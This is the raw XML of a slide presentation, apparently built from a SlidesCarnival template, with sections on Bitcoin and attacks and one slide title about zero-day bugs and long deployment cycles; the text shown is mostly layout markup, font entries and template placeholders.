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20"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="341" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="337" r:id="rId6"/>
    <p:sldId id="30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11" r:id="rId16"/>
    <p:sldId id="307" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="353" r:id="rId20"/>
    <p:sldId id="258" r:id="rId21"/>
    <p:sldId id="269" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="315" r:id="rId24"/>
    <p:sldId id="312" r:id="rId25"/>
    <p:sldId id="316" r:id="rId26"/>
    <p:sldId id="313" r:id="rId27"/>
    <p:sldId id="346" r:id="rId28"/>
    <p:sldId id="318" r:id="rId29"/>
    <p:sldId id="319" r:id="rId30"/>
    <p:sldId id="322" r:id="rId31"/>
    <p:sldId id="323" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="345" r:id="rId34"/>
    <p:sldId id="320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44" r:id="rId43"/>
    <p:sldId id="321" r:id="rId44"/>
    <p:sldId id="332" r:id="rId45"/>
    <p:sldId id="339" r:id="rId46"/>
    <p:sldId id="347" r:id="rId47"/>
    <p:sldId id="343" r:id="rId48"/>
    <p:sldId id="333" r:id="rId49"/>
    <p:sldId id="334" r:id="rId50"/>
    <p:sldId id="260" r:id="rId51"/>
    <p:sldId id="335" r:id="rId52"/>
    <p:sldId id="266" r:id="rId53"/>
    <p:sldId id="352" r:id="rId54"/>
    <p:sldId id="342" r:id="rId55"/>
    <p:sldId id="351" r:id="rId56"/>
    <p:sldId id="278" r:id="rId57"/>
    <p:sldId id="354" r:id="rId58"/>
    <p:sldId id="355" r:id="rId59"/>
    <p:sldId id="356" r:id="rId60"/>
    <p:sldId id="357" r:id="rId61"/>
    <p:sldId id="358" r:id="rId62"/>
    <p:sldId id="359" r:id="rId63"/>
    <p:sldId id="360" r:id="rId64"/>
    <p:sldId id="361" r:id="rId65"/>
    <p:sldId id="362" r:id="rId66"/>
    <p:sldId id="363" r:id="rId67"/>
    <p:sldId id="364" r:id="rId68"/>
    <p:sldId id="365" r:id="rId69"/>
    <p:sldId id="366" r:id="rId70"/>
    <p:sldId id="367" r:id="rId71"/>
    <p:sldId id="378" r:id="rId72"/>
    <p:sldId id="379" r:id="rId73"/>
    <p:sldId id="381" r:id="rId74"/>
    <p:sldId id="380" r:id="rId75"/>
    <p:sldId id="382" r:id="rId76"/>
    <p:sldId id="384" r:id="rId77"/>
    <p:sldId id="385" r:id="rId78"/>
    <p:sldId id="383" r:id="rId79"/>
    <p:sldId id="386" r:id="rId80"/>
    <p:sldId id="388" r:id="rId81"/>
    <p:sldId id="387" r:id="rId82"/>
    <p:sldId id="257" r:id="rId83"/>
    <p:sldId id="259" r:id="rId84"/>
    <p:sldId id="261" r:id="rId85"/>
    <p:sldId id="262" r:id="rId86"/>
    <p:sldId id="263" r:id="rId87"/>
    <p:sldId id="264" r:id="rId88"/>
    <p:sldId id="265" r:id="rId89"/>
    <p:sldId id="336" r:id="rId90"/>
    <p:sldId id="267" r:id="rId91"/>
    <p:sldId id="350" r:id="rId92"/>
    <p:sldId id="268" r:id="rId93"/>
    <p:sldId id="317" r:id="rId94"/>
    <p:sldId id="270" r:id="rId95"/>
    <p:sldId id="271" r:id="rId96"/>
    <p:sldId id="272" r:id="rId97"/>
    <p:sldId id="273" r:id="rId98"/>
    <p:sldId id="274" r:id="rId99"/>
    <p:sldId id="275" r:id="rId100"/>
    <p:sldId id="276" r:id="rId101"/>
    <p:sldId id="277" r:id="rId102"/>
    <p:sldId id="349" r:id="rId103"/>
    <p:sldId id="279" r:id="rId104"/>
    <p:sldId id="280" r:id="rId105"/>
    <p:sldId id="281" r:id="rId106"/>
    <p:sldId id="282" r:id="rId107"/>
    <p:sldId id="283" r:id="rId108"/>
    <p:sldId id="284" r:id="rId109"/>
    <p:sldId id="285" r:id="rId110"/>
    <p:sldId id="286" r:id="rId111"/>
    <p:sldId id="287" r:id="rId112"/>
    <p:sldId id="288" r:id="rId113"/>
    <p:sldId id="289" r:id="rId114"/>
    <p:sldId id="290" r:id="rId115"/>
    <p:sldId id="291" r:id="rId116"/>
    <p:sldId id="292" r:id="rId117"/>
    <p:sldId id="293" r:id="rId118"/>
    <p:sldId id="294" r:id="rId119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121"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId122"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId123"/>
      <p:bold r:id="rId124"/>
      <p:italic r:id="rId125"/>
      <p:boldItalic r:id="rId126"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Homemade Apple" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId127"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId128"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId129"/>
      <p:bold r:id="rId130"/>
      <p:italic r:id="rId131"/>
      <p:boldItalic r:id="rId132"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Raleway" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId133"/>
      <p:bold r:id="rId134"/>
      <p:italic r:id="rId135"/>
      <p:boldItalic r:id="rId136"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId137"/>
      <p:bold r:id="rId138"/>
      <p:italic r:id="rId139"/>
      <p:boldItalic r:id="rId140"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Wide Latin" panose="020A0A07050505020404" pitchFamily="18" charset="77"/>
      <p:regular r:id="rId1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8CBE5D2-C419-7646-8DE0-67C4D9E36017}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="341"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="337"/>
            <p14:sldId id="30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11"/>
            <p14:sldId id="307"/>
            <p14:sldId id="309"/>
            <p14:sldId id="310"/>
            <p14:sldId id="353"/>
            <p14:sldId id="258"/>
            <p14:sldId id="269"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="312"/>
            <p14:sldId id="316"/>
            <p14:sldId id="313"/>
            <p14:sldId id="346"/>
            <p14:sldId id="318"/>
            <p14:sldId id="319"/>
            <p14:sldId id="322"/>
            <p14:sldId id="323"/>
            <p14:sldId id="324"/>
            <p14:sldId id="345"/>
            <p14:sldId id="320"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="329"/>
            <p14:sldId id="330"/>
            <p14:sldId id="331"/>
            <p14:sldId id="344"/>
            <p14:sldId id="321"/>
            <p14:sldId id="332"/>
            <p14:sldId id="339"/>
            <p14:sldId id="347"/>
            <p14:sldId id="343"/>
            <p14:sldId id="333"/>
            <p14:sldId id="334"/>
            <p14:sldId id="260"/>
            <p14:sldId id="335"/>
            <p14:sldId id="266"/>
            <p14:sldId id="352"/>
            <p14:sldId id="342"/>
            <p14:sldId id="351"/>
            <p14:sldId id="278"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="BitCoin" id="{08AE3DA1-344D-7D4E-A126-6E31A6093B8B}">
          <p14:sldIdLst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</p14:sldIdLst>
        </p14:section>
        <p14:section name="Attacks" id="{B73BE03F-96A7-D445-9243-2F8D5EF8A9FD}">
          <p14:sldIdLst>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379"/>
            <p14:sldId id="381"/>
            <p14:sldId id="380"/>
            <p14:sldId id="382"/>
            <p14:sldId id="384"/>
            <p14:sldId id="385"/>
            <p14:sldId id="383"/>
            <p14:sldId id="386"/>
            <p14:sldId id="388"/>
            <p14:sldId id="387"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Template Slides" id="{0B00210F-B337-F741-8C4E-F300E0B8A026}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="259"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="336"/>
            <p14:sldId id="267"/>
            <p14:sldId id="350"/>
            <p14:sldId id="268"/>
            <p14:sldId id="317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349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C1D6"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="989497"/>
    <a:srgbClr val="987D91"/>
    <a:srgbClr val="836C7D"/>
    <a:srgbClr val="B294AB"/>
    <a:srgbClr val="4D404A"/>
    <a:srgbClr val="367C97"/>
    <a:srgbClr val="022A3D"/>
    <a:srgbClr val="5E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BD4B46-1FE6-4C37-B333-B28726F1F195}">
  <a:tblStyle styleId="{D6BD4B46-1FE6-4C37-B333-B28726F1F1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2FB1C1-C29F-448D-9ACA-C1423508158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825"/>
    <p:restoredTop sz="94722"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="204" d="100"/>
          <a:sy n="204" d="100"/>
        </p:scale>
        <p:origin x="208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8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4.fntdata"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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4.fntdata"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font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20.fntdata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0.fntdata"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15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font" Target="fonts/font5.fntdata"/><Relationship Id="rId141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1.fntdata"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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.fntdata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2.fntdata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3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3.fntdata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4151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7c09fa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7c09fa8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4fb3a372b_3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4fb3a372b_3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65b20fed8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65b20fed8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966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928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039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537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985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970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318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468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 years &amp; 3 months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1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1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7944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67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35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Oliver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994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Release takes 2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77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39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449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Sophia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507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907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7613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626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Alex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8015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762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5001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558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5648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2865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236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271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004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2691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2277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6247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2541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2759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0951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901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3255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31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639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9999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1725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0298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22490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7239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3498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8381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0754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6065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119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700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2370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0353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765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7.7 billion people on earth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4623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5796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9813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0352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4278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4049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127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6434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0690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28081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0956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2291632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2291632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22916326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22916326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22916326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22916326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22916326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22916326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22916326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22916326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22916326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22916326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229163268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229163268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c22916326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c22916326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c22916326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c22916326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11F235-5840-125E-EDD1-B4A2BC6A53A9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C8E7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>
                <a:solidFill>
                  <a:srgbClr val="53806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pattFill prst="trellis">
          <a:fgClr>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:fgClr>
          <a:bgClr>
            <a:schemeClr val="tx1"/>
          </a:bgClr>
        </a:patt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60C2F-7660-80B8-DC89-1CAF4CA9D6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5605436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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3840494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29237-16AA-F37A-9FBD-C45866F9B1BE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37395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4158725" y="1509350"/>
            <a:ext cx="826550" cy="688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20124D">
                    <a:alpha val="28459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643400" y="1849275"/>
            <a:ext cx="5857200" cy="2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✘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✘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35371-9731-B4FA-602A-E2DCFB9C93E0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E5E5E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25278-D3B4-1F5F-2E40-95836FDCF7B0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367C9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 dirty="0"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1E93A-51CD-BBBE-7271-04B177B8F4BE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987D9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>
                <a:solidFill>
                  <a:srgbClr val="98949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Font typeface="Homemade Apple"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:latin typeface="Homemade Apple"/>
                <a:ea typeface="Homemade Apple"/>
                <a:cs typeface="Homemade Apple"/>
                <a:sym typeface="Homemade Apple"/>
              </a:defRPr>
            </a:lvl1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EB1BF-B480-A782-EC39-292829C17467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C8E7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95250" y="187775"/>
            <a:ext cx="8753400" cy="47679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782850" y="1364719"/>
            <a:ext cx="7578300" cy="3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-125" y="4929188"/>
            <a:ext cx="91440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" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slidescarnival.com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homemade-apple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8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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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lidescarnival.com/copyright-and-legal-information" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slidescarnival.com/help-use-presentation-template" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10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F765D0-B506-904E-C322-FF0F8A6BE994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213756" y="213756"/>
            <a:ext cx="8710550" cy="4720441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="3843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Google Shape;48;p11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Zero-day bugs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>and the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>risk of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>loooong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> deployment cycle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2017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$4,470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0075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body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057075" y="671138"/>
            <a:ext cx="31971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tablet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44" name="Google Shape;244;p3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246" name="Google Shape;246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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487600" y="2822125"/>
            <a:ext cx="3048600" cy="15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desktop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4090774" y="1554054"/>
            <a:ext cx="4542205" cy="2661224"/>
            <a:chOff x="4090774" y="1554054"/>
            <a:chExt cx="4542205" cy="2661224"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4462224" y="155405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4090774" y="4145246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4090774" y="4089220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6025118" y="4089220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" name="Google Shape;262;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6620"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4597950" y="1700775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thanks!</a:t>
            </a:r>
            <a:endParaRPr sz="3000"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12556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ANY QUESTIONS?</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1"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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4523350" y="2464406"/>
            <a:ext cx="3834300" cy="20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You can find me at:</a:t>
            </a:r>
            <a:endParaRPr sz="24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@username</a:t>
            </a:r>
            <a:endParaRPr sz="24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user@mail.me</a:t>
            </a:r>
            <a:endParaRPr sz="240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8120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Presentation template by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SlidesCarnival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Photographs by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Unsplash</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p3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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489200" y="1371600"/>
            <a:ext cx="6165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This presentations uses the following typographies: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✘"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Titles: Homemade Apple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✘"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body copy: Raleway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Download for free at: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https://www.fontsquirrel.com/fonts/raleway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https://www.fontsquirrel.com/fonts/homemade-apple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802650" y="4076400"/>
            <a:ext cx="7538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757227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692609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NOV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627991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OCT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563373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SEP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498755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AUG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34137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JUL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MAY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FEB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3" name="Google Shape;313;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2046131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4" name="Google Shape;314;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200744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5" name="Google Shape;315;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="333953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6" name="Google Shape;316;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330232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7" name="Google Shape;317;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4632942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8" name="Google Shape;318;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459720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9" name="Google Shape;319;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5926347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0" name="Google Shape;320;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589208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1" name="Google Shape;321;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7219752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2" name="Google Shape;322;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718696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5" name="Google Shape;325;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="270276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6" name="Google Shape;326;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643073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9" name="Google Shape;329;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="528957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0" name="Google Shape;330;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247819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1" name="Google Shape;331;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="658298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2" name="Google Shape;332;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550192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87638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839394" y="3495750"/>
            <a:ext cx="101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44" name="Google Shape;344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1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6" name="Google Shape;346;p3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47" name="Google Shape;347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3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9" name="Google Shape;349;p3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50" name="Google Shape;350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5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2" name="Google Shape;352;p3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353" name="Google Shape;353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4" name="Google Shape;354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6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5" name="Google Shape;355;p3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356" name="Google Shape;356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7" name="Google Shape;357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4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8" name="Google Shape;358;p3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359" name="Google Shape;359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60" name="Google Shape;360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2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61" name="Google Shape;361;p38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38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72" name="Google Shape;372;p3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  <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="373" name="Google Shape;373;p39"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="392525" y="1320481"/>
          <a:ext cx="8382600" cy="3441750"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{D6BD4B46-1FE6-4C37-B333-B28726F1F195}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4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 1</a:t>
                      </a:r>
                      <a:endParaRPr sz="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 2</a:t>
                      </a:r>
                      <a:endParaRPr sz="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109</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431200" y="13634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STRENGTHS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4664148" y="13634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WEAKNESSES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431200" y="31219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OPPORTUNITIES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4664148" y="31219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THREATS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0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0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0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0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389" name="Google Shape;389;p40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390" name="Google Shape;390;p40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391" name="Google Shape;391;p40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2018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$6,622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0307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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262200" y="224350"/>
            <a:ext cx="86196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397" name="Google Shape;397;p4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110</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398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Activities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Resources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Value Propositions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Relationships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Channels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Segments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Partners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Cost Structure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6" name="Google Shape;406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Revenue Streams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1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1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1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1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1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111</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="855292" y="1260643"/>
            <a:ext cx="3608219" cy="3243858"/>
            <a:chOff x="855292" y="1413043"/>
            <a:chExt cx="3608219" cy="3243858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="423" name="Google Shape;423;p42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021526">
                <a:alpha val="150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0" name="Google Shape;430;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383550" y="1797675"/>
            <a:ext cx="1056900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="76A5A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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="16256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2" name="Google Shape;432;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4227875" y="22793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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="21072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4" name="Google Shape;434;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4006650" y="27609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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="25888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6" name="Google Shape;436;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3818200" y="32425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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="30704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8" name="Google Shape;438;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3613350" y="37241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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="35520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40" name="Google Shape;440;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3400325" y="42057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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502050" y="40337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47" name="Google Shape;447;p4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112</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="448" name="Google Shape;448;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4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Imani Jackson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0" name="Google Shape;450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1" name="Google Shape;451;p4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Marcos Galán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2" name="Google Shape;452;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6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3" name="Google Shape;453;p4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Ixchel Valdía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4" name="Google Shape;454;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7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5" name="Google Shape;455;p4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Nils Årud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467100" y="190225"/>
            <a:ext cx="8209800" cy="3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461" name="Google Shape;461;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695166" y="660228"/>
            <a:ext cx="7753800" cy="39750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44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="856687" y="660220"/>
            <a:ext cx="7430303" cy="3975073"/>
            <a:chOff x="638138" y="467100"/>
            <a:chExt cx="7867750" cy="4194000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="463" name="Google Shape;463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9" name="Google Shape;509;p4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113</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="695153" y="825832"/>
            <a:ext cx="7753448" cy="3643720"/>
            <a:chOff x="467088" y="642474"/>
            <a:chExt cx="4194000" cy="3858239"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="511" name="Google Shape;511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33" name="Google Shape;533;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572001" y="660228"/>
            <a:ext cx="0" cy="397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534" name="Google Shape;534;p44"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695166" y="2647799"/>
            <a:ext cx="7753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535" name="Google Shape;535;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="9550" y="2569750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 rot="5400000">
            <a:off x="7919500" y="2569812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7" name="Google Shape;537;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964561" y="4635334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8" name="Google Shape;538;p44"/>
          <p:cNvSpPr txBox="1"/>
